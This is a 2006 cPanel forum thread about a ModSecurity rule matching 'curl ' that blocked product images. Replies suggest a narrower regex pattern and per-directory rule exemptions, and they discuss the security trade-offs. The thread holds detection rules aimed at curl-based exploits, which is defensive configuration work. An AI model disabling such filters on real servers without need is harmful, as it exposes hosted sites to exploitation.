The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Using curl ruleset on modsec give my client image trouble to load

Discussion in 'Security' started by isputra, Aug 20, 2006.

  1. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    Hi,

    I use modsec and one of the ruleset is :

    SecFilterSelective THE_REQUEST "curl "

    This ruleset will deny all image using "curl" name to show.

    Example :
    /Others/Sendal%20Ripcurl%20Man%20woman.jpg HTTP/1.1 | Access denied with code 406. Pattern match "curl " at THE_REQUEST

    My client have shopcart that sell ripcurl product and all image can not shows on browser because of this ruleset.

    Is there any way to avoid this without changing images name ?

    Thanks
     
  2. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    Anyone have solution about this issue ?
     
  3. imran_kh

    imran_kh Registered

    Joined:
    May 16, 2006
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    1
    just recompile php with full curl support :)
     
  4. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    Please read my first post again.

    This problem about mod_sec blocking all file name that have "curl" as the filename because of SecFilterSelective THE_REQUEST "curl " at mod_sec rule.

    I think this is not relevan with recompile php with full curl support. But just for your information, my php already have full curl support :)
     
  5. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Just using common english words like that will cause you problems.

    Since (I believe) you can't run any effective curl commands without options (curl -O etc.) you can add the minus sign (-) to the rule.

    You could try something like this:
    Code:
    SecFilterSelective THE_REQUEST "curl[[:space:]]+-"
    Another option is to use the 'chain' feature in mod_security to combine rules.

    Your logs will give you a good idea also as to what rule will be effective or not. Just scan your logs for curl exploits and apply that information to create an effective rule.
     
  6. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,383
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    The best solution is to use ids for all of your mod security rules, something like:

    SecFilterSelective THE_REQUEST "curl " id:1000,deny,log,status:406

    This gives anything that matches this mod_security rule the ID 1000.

    Now in your httpd.conf file, in the VirtualHost container for this specific account add:

    <IfModule mod_security.c>
    <Location /Others>
    SecFilterRemove 1000
    </Location>
    <IfModule>


    The <Location> container is not completely necessary, but it helps localize the issue. However, this also means that should an exploitable script exist in the /Others directory, then it can then be used to execute curl commands, because files in that directory are exempt from the mod_security rule id 1000 (curl). If you don't use the <Location> container, then this means that any script in the VirtualHost would be exempt from the curl mod_security rule.
     
  7. isputra

    isputra Well-Known Member

    Joined:
    May 3, 2003
    Messages:
    576
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Mbelitar
    How about if my user have 3 directory to place his file ? Ex. Others, Jacket, and Surfboard

    What i must add on <Location> ? Is it <Location /Others; /Jacket; /Surfboard> ?
     
    #7 isputra, Aug 28, 2006
    Last edited: Aug 28, 2006
  8. sparek-3

    sparek-3 Well-Known Member

    Joined:
    Aug 10, 2002
    Messages:
    1,383
    Likes Received:
    23
    Trophy Points:
    38
    cPanel Access Level:
    Root Administrator
    You would do something like:

    <IfModule mod_security.c>
    <Location /Others>
    SecFilterRemove 1000
    </Location>
    <Location /Jacket>
    SecFilterRemove 1000
    </Location>
    <Location /Surfboard>
    SecFilterRemove 1000
    </Location>
    <IfModule>


    You would need a separate <Location> container for each directory. If you have a bunch of files that are affected by this rule, then you might consider leaving the <Location> containers out and just using something like:

    <IfModule mod_security.c>
    SecFilterRemove 1000
    <IfModule>


    That would exempt the entire VirtualHost from the curl rule, which could open it for exploiting if the account has any outdated or vulnerable scripts installed. Or you could do as other have suggested and be more descriptive in your mod_security rule.

    There really just isn't a black and white way of doing this. This is all just a gray area. How much security do you want to provide? Where do you draw the line with security versus website usability? If an account is not able to use anything on the account because of your security measures, then your security measures are probably too strict.
     
Loading...

Share This Page